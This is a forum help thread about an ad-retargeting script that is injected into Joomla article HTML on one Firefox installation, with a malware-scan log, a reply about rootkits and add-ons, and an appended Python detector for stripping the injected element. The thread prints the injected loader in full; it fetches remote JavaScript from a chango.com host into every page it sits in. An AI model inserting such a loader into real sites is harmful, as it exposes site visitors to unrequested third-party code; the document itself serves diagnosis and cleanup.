chango worm javascript code insertion

I am a web developer creating multiple sites on the Joomla 2.5 platform on a dedicated server. On one of my computers (and only one), when editing code in HTML view using Firefox 14.0, toggling between text and HTML mode, the following script is automatically added to the end of the article code:

<script id="__changoScript" type="text/javascript">// <![CDATA[
var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};
(function() {
  var c = document.createElement('script');
  c.type = 'text/javascript';
  c.async = true;
  c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js';
  var s = document.getElementsByTagName('script')[0];
  s.parentNode.insertBefore(c, s);
})();
// ]]></script>

This happens on any of my sites, when edited on this one computer. It doesn't happen on this computer with Safari or Chrome.

I have removed Firefox and reinstalled - same problem. I ran Malwarebytes... it found and deleted the following:

Registry Keys Detected: 6
HKCR\CLSID\{7d9e1adc-7db1-4eaf-b6c7-7e062074e6be} (PUP.BlekkoSearchBar) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\vfd-adk (Rootkit.Agent) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SETUP.EXE (PUP.Bundle.Installer.OI) -> Quarantined and deleted successfully.
HKCR\bho_project.bho_object (Trojan.BHO) -> Quarantined and deleted successfully.
HKCR\bho_project.bho_object.1 (Trojan.BHO) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Google\Chrome\Extensions\kincjchfokkeneeofpeefomkikfkiedl (PUP.FCTPlugin) -> Quarantined and deleted successfully.

But the problem remains... anyone seen something like this or got any suggestions?

Thanks, Andrew

All Replies (1)

If your computer has a rootkit agent, you probably should do a deep cleaning with anti-rootkit software.

Chango says it offers "search retargeting" services to advertisers. Perhaps this has been incorporated into one of your add-ons unique to this installation of Firefox? Try disabling all non-essential extensions here:

orange Firefox button or classic Tools menu > Add-ons > Extensions category
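
For articles that were already saved from the affected machine, the stored HTML can be checked for the injected element. The following is an added example, not code from this thread or from Joomla: the function names and the sample article bodies are constructed for illustration, and the two markers (the `__changoScript` id and the `.chango.com` host suffix) are taken from the snippet quoted in the question.

```python
import re

# Any <script>...</script> element; the body may span several lines.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
# Markers taken from the snippet quoted in the question.
ID_RE = re.compile(r"""\bid\s*=\s*["']?__changoScript\b""", re.I)
HOST_RE = re.compile(r"\.chango\.com\b", re.I)

# Constructed sample article bodies (not real site content).
SAMPLES = {
    "full": '<p>About</p>\n<script id="__changoScript" type="text/javascript">'
            "// <![CDATA[\nvar c = document.createElement('script');"
            "c.src = ('https:' == document.location.protocol ? 'https://z' : 'http://p')"
            " + '.chango.com/static/c.js'; // ]]></script>",
    "stripped_body": '<p>Contact</p><script id="__changoScript" '
                     'type="text/javascript">// </script>',
    "no_id": "<p>News</p><script>var u = 'http://p' + '.chango.com/static/c.js';</script>",
    "clean": '<p>Map</p><script src="/js/site.js"></script>',
}


def find_injected(html):
    """Return (start, end, reason) for every script element matching a marker."""
    hits = []
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        if ID_RE.search(attrs):
            hits.append((m.start(), m.end(), "id=__changoScript"))
        elif HOST_RE.search(attrs) or HOST_RE.search(body):
            # The loader concatenates its URL, so match the host suffix,
            # not a complete URL.
            hits.append((m.start(), m.end(), "references .chango.com"))
    return hits


def strip_injected(html):
    """Return html with the flagged script elements removed."""
    out, pos = [], 0
    for start, end, _reason in find_injected(html):
        out.append(html[pos:start])
        pos = end
    out.append(html[pos:])
    return "".join(out)


if __name__ == "__main__":
    for name, html in SAMPLES.items():
        print(name, [r for _, _, r in find_injected(html)], repr(strip_injected(html)))
```

Run it over an export of the article bodies and review each hit before writing cleaned content back; the id check also catches the variant where the editor has emptied the script body.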